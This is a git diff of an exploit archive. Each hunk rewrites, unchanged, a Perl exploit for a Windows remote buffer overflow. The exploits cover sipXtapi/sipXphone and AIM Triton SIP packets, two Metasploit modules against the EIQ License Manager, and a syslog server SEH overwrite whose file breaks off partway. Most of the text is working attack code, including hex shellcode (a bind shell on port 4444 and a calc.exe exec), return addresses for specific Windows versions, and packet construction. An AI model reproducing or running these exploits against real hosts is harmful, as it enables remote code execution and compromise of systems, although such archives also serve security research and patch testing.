@@ -1,83 +1,83 @@ -#!/usr/bin/perl -# -# Remote Buffer Overflow in sipXtapi -# -# bad char 0x00 0x09 0x0a 0x0d 0x20 -# - - -use IO::Socket; -#use strict; - -print "\n\n"; -print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaro\n\n"; -print "tested on sipXphone 2.6.0.27 read the code for ret address\n\n"; - -if (not $ARGV[0]) { - print "Usage: sipx.pl \n"; -exit;} - -$target=$ARGV[0]; -my $source ="127.0.0.1"; -my $target_port = 5060; -my $user ="bad"; -my $nextseh = "\xeb\x06\x90\x90"; -my $seh="\xb0\x67\x01\x08"; # pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ? -#my $seh="\x27\x13\x02\x08"; # call ebx in jvm.dll for win2k Pro SP0 Italian universal ? -#my $seh="\x22\x92\x06\x08"; # jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ? - # if you use this ret you can exploits the target host many times -my $nop = "\x90"x32; - - -# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com -my $shellcode = -"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25". -"\xe3\xa5\x9f\x83\xeb\xfc\xe2\xf4\xd9\x89\x4e\xd2\xcd\x1a\x5a\x60". -"\xda\x83\x2e\xf3\x01\xc7\x2e\xda\x19\x68\xd9\x9a\x5d\xe2\x4a\x14". -"\x6a\xfb\x2e\xc0\x05\xe2\x4e\xd6\xae\xd7\x2e\x9e\xcb\xd2\x65\x06". -"\x89\x67\x65\xeb\x22\x22\x6f\x92\x24\x21\x4e\x6b\x1e\xb7\x81\xb7". -"\x50\x06\x2e\xc0\x01\xe2\x4e\xf9\xae\xef\xee\x14\x7a\xff\xa4\x74". -"\x26\xcf\x2e\x16\x49\xc7\xb9\xfe\xe6\xd2\x7e\xfb\xae\xa0\x95\x14". -"\x65\xef\x2e\xef\x39\x4e\x2e\xdf\x2d\xbd\xcd\x11\x6b\xed\x49\xcf". -"\xda\x35\xc3\xcc\x43\x8b\x96\xad\x4d\x94\xd6\xad\x7a\xb7\x5a\x4f". -"\x4d\x28\x48\x63\x1e\xb3\x5a\x49\x7a\x6a\x40\xf9\xa4\x0e\xad\x9d". -"\x70\x89\xa7\x60\xf5\x8b\x7c\x96\xd0\x4e\xf2\x60\xf3\xb0\xf6\xcc". -"\x76\xb0\xe6\xcc\x66\xb0\x5a\x4f\x43\x8b\xb4\xc3\x43\xb0\x2c\x7e". -"\xb0\x8b\x01\x85\x55\x24\xf2\x60\xf3\x89\xb5\xce\x70\x1c\x75\xf7". -"\x81\x4e\x8b\x76\x72\x1c\x73\xcc\x70\x1c\x75\xf7\xc0\xaa\x23\xd6". 
-"\x72\x1c\x73\xcf\x71\xb7\xf0\x60\xf5\x70\xcd\x78\x5c\x25\xdc\xc8". -"\xda\x35\xf0\x60\xf5\x85\xcf\xfb\x43\x8b\xc6\xf2\xac\x06\xcf\xcf". -"\x7c\xca\x69\x16\xc2\x89\xe1\x16\xc7\xd2\x65\x6c\x8f\x1d\xe7\xb2". -"\xdb\xa1\x89\x0c\xa8\x99\x9d\x34\x8e\x48\xcd\xed\xdb\x50\xb3\x60". -"\x50\xa7\x5a\x49\x7e\xb4\xf7\xce\x74\xb2\xcf\x9e\x74\xb2\xf0\xce". -"\xda\x33\xcd\x32\xfc\xe6\x6b\xcc\xda\x35\xcf\x60\xda\xd4\x5a\x4f". -"\xae\xb4\x59\x1c\xe1\x87\x5a\x49\x77\x1c\x75\xf7\xd5\x69\xa1\xc0". -"\x76\x1c\x73\x60\xf5\xe3\xa5\x9f"; -my $cseq =("\x41"x204).$nextseh.$seh.$nop.$shellcode; - - -my $packet =<\r -Via: SIP/2.0/UDP $target:3277\r -From: "moz"\r -Call-ID: 3121$target\r -CSeq: $cseq\r -Max-Forwards: 70\r -Contact: \r -\r -END - -print "Sending Packet to: " . $target . "\n\n"; -socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); -my $ipaddr = inet_aton($target); -my $sendto = sockaddr_in($target_port,$ipaddr); -send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n"; -print "Done.\n"; -$host = $ARGV[0]; - -print " + connect to $host on port 4444...\n"; - -system("telnet $host 4444"); - -# milw0rm.com [2006-07-24] +#!/usr/bin/perl +# +# Remote Buffer Overflow in sipXtapi +# +# bad char 0x00 0x09 0x0a 0x0d 0x20 +# + + +use IO::Socket; +#use strict; + +print "\n\n"; +print "sipXtapi original Exploit by Michael Thumann added a real shellcode by acaro\n\n"; +print "tested on sipXphone 2.6.0.27 read the code for ret address\n\n"; + +if (not $ARGV[0]) { + print "Usage: sipx.pl \n"; +exit;} + +$target=$ARGV[0]; +my $source ="127.0.0.1"; +my $target_port = 5060; +my $user ="bad"; +my $nextseh = "\xeb\x06\x90\x90"; +my $seh="\xb0\x67\x01\x08"; # pop pop ret in jvm.dll for winxp Pro SP2 Italian universal ? +#my $seh="\x27\x13\x02\x08"; # call ebx in jvm.dll for win2k Pro SP0 Italian universal ? +#my $seh="\x22\x92\x06\x08"; # jmp ebx in jvm.dll for win2k Pro SP0 Italian universal ? 
+ # if you use this ret you can exploits the target host many times +my $nop = "\x90"x32; + + +# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com +my $shellcode = +"\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x25". +"\xe3\xa5\x9f\x83\xeb\xfc\xe2\xf4\xd9\x89\x4e\xd2\xcd\x1a\x5a\x60". +"\xda\x83\x2e\xf3\x01\xc7\x2e\xda\x19\x68\xd9\x9a\x5d\xe2\x4a\x14". +"\x6a\xfb\x2e\xc0\x05\xe2\x4e\xd6\xae\xd7\x2e\x9e\xcb\xd2\x65\x06". +"\x89\x67\x65\xeb\x22\x22\x6f\x92\x24\x21\x4e\x6b\x1e\xb7\x81\xb7". +"\x50\x06\x2e\xc0\x01\xe2\x4e\xf9\xae\xef\xee\x14\x7a\xff\xa4\x74". +"\x26\xcf\x2e\x16\x49\xc7\xb9\xfe\xe6\xd2\x7e\xfb\xae\xa0\x95\x14". +"\x65\xef\x2e\xef\x39\x4e\x2e\xdf\x2d\xbd\xcd\x11\x6b\xed\x49\xcf". +"\xda\x35\xc3\xcc\x43\x8b\x96\xad\x4d\x94\xd6\xad\x7a\xb7\x5a\x4f". +"\x4d\x28\x48\x63\x1e\xb3\x5a\x49\x7a\x6a\x40\xf9\xa4\x0e\xad\x9d". +"\x70\x89\xa7\x60\xf5\x8b\x7c\x96\xd0\x4e\xf2\x60\xf3\xb0\xf6\xcc". +"\x76\xb0\xe6\xcc\x66\xb0\x5a\x4f\x43\x8b\xb4\xc3\x43\xb0\x2c\x7e". +"\xb0\x8b\x01\x85\x55\x24\xf2\x60\xf3\x89\xb5\xce\x70\x1c\x75\xf7". +"\x81\x4e\x8b\x76\x72\x1c\x73\xcc\x70\x1c\x75\xf7\xc0\xaa\x23\xd6". +"\x72\x1c\x73\xcf\x71\xb7\xf0\x60\xf5\x70\xcd\x78\x5c\x25\xdc\xc8". +"\xda\x35\xf0\x60\xf5\x85\xcf\xfb\x43\x8b\xc6\xf2\xac\x06\xcf\xcf". +"\x7c\xca\x69\x16\xc2\x89\xe1\x16\xc7\xd2\x65\x6c\x8f\x1d\xe7\xb2". +"\xdb\xa1\x89\x0c\xa8\x99\x9d\x34\x8e\x48\xcd\xed\xdb\x50\xb3\x60". +"\x50\xa7\x5a\x49\x7e\xb4\xf7\xce\x74\xb2\xcf\x9e\x74\xb2\xf0\xce". +"\xda\x33\xcd\x32\xfc\xe6\x6b\xcc\xda\x35\xcf\x60\xda\xd4\x5a\x4f". +"\xae\xb4\x59\x1c\xe1\x87\x5a\x49\x77\x1c\x75\xf7\xd5\x69\xa1\xc0". +"\x76\x1c\x73\x60\xf5\xe3\xa5\x9f"; +my $cseq =("\x41"x204).$nextseh.$seh.$nop.$shellcode; + + +my $packet =<\r +Via: SIP/2.0/UDP $target:3277\r +From: "moz"\r +Call-ID: 3121$target\r +CSeq: $cseq\r +Max-Forwards: 70\r +Contact: \r +\r +END + +print "Sending Packet to: " . $target . 
"\n\n"; +socket(PING, PF_INET, SOCK_DGRAM, getprotobyname("udp")); +my $ipaddr = inet_aton($target); +my $sendto = sockaddr_in($target_port,$ipaddr); +send(PING, $packet, 0, $sendto) == length($packet) or die "cannot send to $target : $target_port : $!\n"; +print "Done.\n"; +$host = $ARGV[0]; + +print " + connect to $host on port 4444...\n"; + +system("telnet $host 4444"); + +# milw0rm.com [2006-07-24] diff --git a/platforms/windows/remote/2074.pm b/platforms/windows/remote/2074.pm index 572e642fc..3f96bce47 100755 --- a/platforms/windows/remote/2074.pm +++ b/platforms/windows/remote/2074.pm 
@@ -1,86 +1,86 @@ -#!/usr/bin/perl -w - -#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs - -package Msf::Exploit::EiQ_License_1262; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'EIQ License Manager Overflow', - 'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ], - - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'win2000', 'winxp' ], - 'Priv' => 0, - - 'AutoOpts' => { 'EXITFUNC' => 'seh' }, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 10616], - }, - 'Payload' => - { - 'Space' => 1262, - 'BadChars' => "\x00\x0a\x0d\x40\x26", - }, - 'Description' => Pex::Text::Freeform(qq{ - This module exploits the buffer overflow found in the LICMGR_ADDLICENSE - Field of EIQ networks network analyser this module exploits buffers of 1262 bytes - in size. This module should work on all rebranded eiq analysers. Exploitation - assistance from KF of digital munition. - }), - - - 'DefaultTarget' => 1, - 'Targets' => - [ - ['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx - ['Windows XP English SP1/SP2', 0x77db64dc ], # jmp ebx - ['Windows Server 2003 English SP0/SP1', 0x77d16764 ], # jmp ebx - ], - - }; - - sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - - sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - my $nops = $self->MakeNops(1262 - length($shellcode)); - my $ret = pack("V", $target->[1]); - my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . 
"&"; - - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1])); - - $s->Send("$evil"); - return; - } - -# milw0rm.com [2006-07-26] +#!/usr/bin/perl -w + +#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs + +package Msf::Exploit::EiQ_License_1262; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'EIQ License Manager Overflow', + 'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ], + + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'win2000', 'winxp' ], + 'Priv' => 0, + + 'AutoOpts' => { 'EXITFUNC' => 'seh' }, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 10616], + }, + 'Payload' => + { + 'Space' => 1262, + 'BadChars' => "\x00\x0a\x0d\x40\x26", + }, + 'Description' => Pex::Text::Freeform(qq{ + This module exploits the buffer overflow found in the LICMGR_ADDLICENSE + Field of EIQ networks network analyser this module exploits buffers of 1262 bytes + in size. This module should work on all rebranded eiq analysers. Exploitation + assistance from KF of digital munition. 
+ }), + + + 'DefaultTarget' => 1, + 'Targets' => + [ + ['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx + ['Windows XP English SP1/SP2', 0x77db64dc ], # jmp ebx + ['Windows Server 2003 English SP0/SP1', 0x77d16764 ], # jmp ebx + ], + + }; + + sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + + sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[$target_idx]; + my $nops = $self->MakeNops(1262 - length($shellcode)); + my $ret = pack("V", $target->[1]); + my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&"; + + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1])); + + $s->Send("$evil"); + return; + } + +# milw0rm.com [2006-07-26] diff --git a/platforms/windows/remote/2075.pm b/platforms/windows/remote/2075.pm index 347234a47..212ac0e90 100755 --- a/platforms/windows/remote/2075.pm +++ b/platforms/windows/remote/2075.pm 
@@ -1,86 +1,86 @@ -#!/usr/bin/perl -w - -#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs - -package Msf::Exploit::EiQ_License_494; -use base "Msf::Exploit"; -use strict; -use Pex::Text; - -my $advanced = { }; - -my $info = - { - 'Name' => 'EIQ License Manager Overflow', - 'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ], - - 'Arch' => [ 'x86' ], - 'OS' => [ 'win32', 'win2000', 'winxp' ], - 'Priv' => 0, - - 'AutoOpts' => { 'EXITFUNC' => 'seh' }, - - 'UserOpts' => - { - 'RHOST' => [1, 'ADDR', 'The target address'], - 'RPORT' => [1, 'PORT', 'The target port', 10616], - }, - 'Payload' => - { - 'Space' => 494, - 'BadChars' => "\x00\x0a\x0d\x40\x26", - }, - 'Description' => Pex::Text::Freeform(qq{ - This module exploits the buffer overflow found in the LICMGR_ADDLICENSE - Field of EIQ networks network analyser this module exploits buffers of 494 bytes - in size. This module should work on all EIQ branded analysers. Exploitation - assistance from KF. - }), - - - 'DefaultTarget' => 1, - 'Targets' => - [ - ['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx - ['Windows XP SP1/SP2 English', 0x77db64dc ], # jmp ebx - ['Windows Server 2003 SP0/SP1 English', 0x77d16764 ], # jmp ebx - ], - - }; - - sub new { - my $class = shift; - my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); - return($self); -} - - sub Exploit { - my $self = shift; - my $target_host = $self->GetVar('RHOST'); - my $target_port = $self->GetVar('RPORT'); - my $target_idx = $self->GetVar('TARGET'); - my $shellcode = $self->GetVar('EncodedPayload')->Payload; - my $target = $self->Targets->[$target_idx]; - my $nops = $self->MakeNops(494 - length($shellcode)); - my $ret = pack("V", $target->[1]); - my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . 
"&"; - - - my $s = Msf::Socket::Tcp->new - ( - 'PeerAddr' => $target_host, - 'PeerPort' => $target_port, - 'LocalPort' => $self->GetVar('CPORT'), - ); - - if ($s->IsError) { - $self->PrintLine('[*] Error creating socket: ' . $s->GetError); - return; - } - $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1])); - - $s->Send("$evil"); - return; - } - -# milw0rm.com [2006-07-26] +#!/usr/bin/perl -w + +#metasploit module for EIQ Licence manager overflow Provided by ri0t of Bastard Labs + +package Msf::Exploit::EiQ_License_494; +use base "Msf::Exploit"; +use strict; +use Pex::Text; + +my $advanced = { }; + +my $info = + { + 'Name' => 'EIQ License Manager Overflow', + 'Authors' => [ 'ri0t ri0t@ri0tnet.net, KF kf_list@digitalmunition.com' ], + + 'Arch' => [ 'x86' ], + 'OS' => [ 'win32', 'win2000', 'winxp' ], + 'Priv' => 0, + + 'AutoOpts' => { 'EXITFUNC' => 'seh' }, + + 'UserOpts' => + { + 'RHOST' => [1, 'ADDR', 'The target address'], + 'RPORT' => [1, 'PORT', 'The target port', 10616], + }, + 'Payload' => + { + 'Space' => 494, + 'BadChars' => "\x00\x0a\x0d\x40\x26", + }, + 'Description' => Pex::Text::Freeform(qq{ + This module exploits the buffer overflow found in the LICMGR_ADDLICENSE + Field of EIQ networks network analyser this module exploits buffers of 494 bytes + in size. This module should work on all EIQ branded analysers. Exploitation + assistance from KF. 
+ }), + + + 'DefaultTarget' => 1, + 'Targets' => + [ + ['Windows 2000 SP0-SP4 English', 0x750316e2], # call ebx + ['Windows XP SP1/SP2 English', 0x77db64dc ], # jmp ebx + ['Windows Server 2003 SP0/SP1 English', 0x77d16764 ], # jmp ebx + ], + + }; + + sub new { + my $class = shift; + my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_); + return($self); +} + + sub Exploit { + my $self = shift; + my $target_host = $self->GetVar('RHOST'); + my $target_port = $self->GetVar('RPORT'); + my $target_idx = $self->GetVar('TARGET'); + my $shellcode = $self->GetVar('EncodedPayload')->Payload; + my $target = $self->Targets->[$target_idx]; + my $nops = $self->MakeNops(494 - length($shellcode)); + my $ret = pack("V", $target->[1]); + my $evil = "LICMGR_ADDLICENSE&" . $nops . $shellcode . $ret . "&"; + + + my $s = Msf::Socket::Tcp->new + ( + 'PeerAddr' => $target_host, + 'PeerPort' => $target_port, + 'LocalPort' => $self->GetVar('CPORT'), + ); + + if ($s->IsError) { + $self->PrintLine('[*] Error creating socket: ' . $s->GetError); + return; + } + $self->PrintLine(sprintf ("[*] Trying ".$target->[0]." using return address 0x%.8x....", $target->[1])); + + $s->Send("$evil"); + return; + } + +# milw0rm.com [2006-07-26] diff --git a/platforms/windows/remote/2076.pl b/platforms/windows/remote/2076.pl index 19aa4e71a..cccfa5c4d 100755 --- a/platforms/windows/remote/2076.pl +++ b/platforms/windows/remote/2076.pl 
@@ -1,76 +1,76 @@ -#!/usr/bin/perl -# -# p0c -# Tested on Windows XP SP2 with triton 1.0.4 -# c0rrupt -{at}- f34r -{dot}- us -# -# This exploits the sipxtapi vuln in triton which was patched.. sometime ago.. -# The exploit sends a specially crafted udp packet to the triton client -# which leads to command execution through a buffer overflow. -# -# The Triton client does not open the sipxtapi port 5061 by default. -# The port is open when the client attemps to try any talk session, and stays -# open for the remainder of the time it is running. - -use IO::Socket::INET; - -$target=$ARGV[0]; - -$MySocket=new IO::Socket::INET->new(PeerPort=>5061,Proto=>'udp',PeerAddr=>$ARGV[0]); - -# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com -my $shellcode = -"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". -"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". -"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". -"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". -"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". -"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37". -"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58". -"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58". -"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". -"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". -"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58". -"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54". -"\x4b\x38\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38". -"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x53". -"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37". -"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x48\x42\x47\x4e\x31\x4d\x4a". -"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b". 
-"\x42\x30\x42\x50\x42\x50\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43". -"\x48\x4f\x42\x56\x48\x45\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57". -"\x42\x55\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x59". -"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56". -"\x4e\x56\x43\x56\x50\x52\x45\x56\x4a\x47\x45\x36\x42\x50\x5a"; - - -if (not $ARGV[0]) -{ - print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n"; - print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n"; - print "[+] Usage: trionPWN.pl [+]\n"; - exit; -} - - - -print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n"; -print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n"; - - -my $cseq = "B"x780 . "\xEB\x0C\x90\x90" . "\xd9\xe7\x01\x40" . "\x90"x500 . $shellcode; - -my $packet = -"INVITE sip:a@127.0.0.1:5555 SIP/2.0\r -From: ;tag=1c32606\r -To: sip:CFB5A74A87D97A19@192.168.1.109:5061\r -Call-Id: 65f65f65d6sexcytv\r -Cseq: $cseq"; - -print "[+] Packet Generated.. Sending to " . $target . "\n"; - -$MySocket->send($packet); - -print "[+] Attack completed, check your shell.\n"; - -# milw0rm.com [2006-07-26] +#!/usr/bin/perl +# +# p0c +# Tested on Windows XP SP2 with triton 1.0.4 +# c0rrupt -{at}- f34r -{dot}- us +# +# This exploits the sipxtapi vuln in triton which was patched.. sometime ago.. +# The exploit sends a specially crafted udp packet to the triton client +# which leads to command execution through a buffer overflow. +# +# The Triton client does not open the sipxtapi port 5061 by default. +# The port is open when the client attemps to try any talk session, and stays +# open for the remainder of the time it is running. 
+ +use IO::Socket::INET; + +$target=$ARGV[0]; + +$MySocket=new IO::Socket::INET->new(PeerPort=>5061,Proto=>'udp',PeerAddr=>$ARGV[0]); + +# win32_exec - EXITFUNC=thread CMD=calc.exe Size=351 Encoder=PexAlphaNum http://metasploit.com +my $shellcode = +"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49". +"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36". +"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34". +"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41". +"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44". +"\x42\x50\x42\x50\x42\x30\x4b\x48\x45\x44\x4e\x43\x4b\x48\x4e\x37". +"\x45\x50\x4a\x47\x41\x50\x4f\x4e\x4b\x38\x4f\x44\x4a\x31\x4b\x58". +"\x4f\x35\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58". +"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c". +"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e". +"\x46\x4f\x4b\x43\x46\x45\x46\x42\x46\x30\x45\x57\x45\x4e\x4b\x58". +"\x4f\x55\x46\x32\x41\x30\x4b\x4e\x48\x36\x4b\x58\x4e\x50\x4b\x54". +"\x4b\x38\x4f\x55\x4e\x41\x41\x50\x4b\x4e\x4b\x38\x4e\x31\x4b\x38". +"\x41\x50\x4b\x4e\x49\x58\x4e\x55\x46\x42\x46\x30\x43\x4c\x41\x53". +"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x37". +"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x48\x42\x47\x4e\x31\x4d\x4a". +"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x30\x4b\x38\x42\x48\x42\x4b". +"\x42\x30\x42\x50\x42\x50\x4b\x48\x4a\x36\x4e\x53\x4f\x55\x41\x43". +"\x48\x4f\x42\x56\x48\x45\x49\x58\x4a\x4f\x43\x48\x42\x4c\x4b\x57". +"\x42\x55\x4a\x36\x4f\x4e\x50\x4c\x42\x4e\x42\x46\x4a\x36\x4a\x59". +"\x50\x4f\x4c\x58\x50\x50\x47\x45\x4f\x4f\x47\x4e\x43\x56\x41\x56". 
+"\x4e\x56\x43\x56\x50\x52\x45\x56\x4a\x47\x45\x36\x42\x50\x5a"; + + +if (not $ARGV[0]) +{ + print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n"; + print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n"; + print "[+] Usage: trionPWN.pl [+]\n"; + exit; +} + + + +print "[+] AIM Triton 1.0.4 (and more) Exploit by c0rrupt [+]\n"; +print "[+] Greetz to n0limit, M03, Brax, raze, DiabloHorn, and everyone else [+]\n"; + + +my $cseq = "B"x780 . "\xEB\x0C\x90\x90" . "\xd9\xe7\x01\x40" . "\x90"x500 . $shellcode; + +my $packet = +"INVITE sip:a@127.0.0.1:5555 SIP/2.0\r +From: ;tag=1c32606\r +To: sip:CFB5A74A87D97A19@192.168.1.109:5061\r +Call-Id: 65f65f65d6sexcytv\r +Cseq: $cseq"; + +print "[+] Packet Generated.. Sending to " . $target . "\n"; + +$MySocket->send($packet); + +print "[+] Attack completed, check your shell.\n"; + +# milw0rm.com [2006-07-26] diff --git a/platforms/windows/remote/2079.pl b/platforms/windows/remote/2079.pl index 3a272799b..20c243f01 100755 --- a/platforms/windows/remote/2079.pl +++ b/platforms/windows/remote/2079.pl 
@@ -1,107 +1,107 @@ -#!/usr/bin/perl -w -# -# http://www.digitalmunition.com -# written by kf (kf_lists[at]digitalmunition[dot]com) - 03/23/2006 -# Bug found by KF of digitalmunition.com. -# -# http://www.zerodayinitiative.com/advisories/ZDI-06-023.html -# -# Exploit for * Syslog Server by eiQnetworks (OEM for Several vendors) -# -# There MUST be a syslog service listening on port 12345 for this to work. The syslog service is not enabled by default -# -# Currently borked... This shit overwrites the SEH on XP SP1. It just needs good shellcode. perhaps a reverse style jmp instead of a -# forward jump. This would eliminate the need for 2 stages of shellcode. . -# -#SEH chain of thread 00000FF4 -#Address SE handler -#013ECEF8 FWASyslo.00449EDB -#013EFF78 WS2HELP.71AA15CF <-------- I set this address. -# -#013EFF74 90909090 -#013EFF78 909032EB Pointer to next SEH record <--- I set this. -#013EFF7C 71AA15CF SE handler <--- pop pop ret -#013EFF80 90909090 -# -#71AA15CF 5F POP EDI -#71AA15D0 5D POP EBP -#71AA15D1 C2 0800 RETN 8 -# -# View the SEH Chain and set a break on the address of the JMP code. This will let you debug the stage one shellcode. -# -use IO::Socket; - -$bufsize = 4096; - -$hostname = "127.0.0.1"; -$nextserec = pack("l", (0xEB069090)); # jmp short +0x06 -$sehandler = pack("V", (0x71abe325)); # pop edi, pop ebp, retn - ws2help.dll (Send this reversed note the 'V') - -# Binary hunts performed by JxT and Titon -$tgts{"0"} = "G2SRv4.0.36.exe:932"; # Use length to SEH overwrite. - -unless (($target,$hostname) = @ARGV,$hostname) { - - print "\n Syslog by eiQnetworks exploit, kf \(kf_lists[at]digitalmunition[dot]com\) - 03/23/2006\n"; - print "\n\nUsage: $0 \n\nTargets:\n\n"; - - foreach $key (sort(keys %tgts)) { - ($a,$b) = split(/\:/,$tgts{"$key"}); - print "\t$key . $a\n"; - } - - print "\n"; - exit 1; -} - - -($a,$b) = split(/\:/,$tgts{"$target"}); -print "*** Target: $a, Len: $b\n"; - -# Stage 2 shellcode can be up to Length of SEH overwrite. 
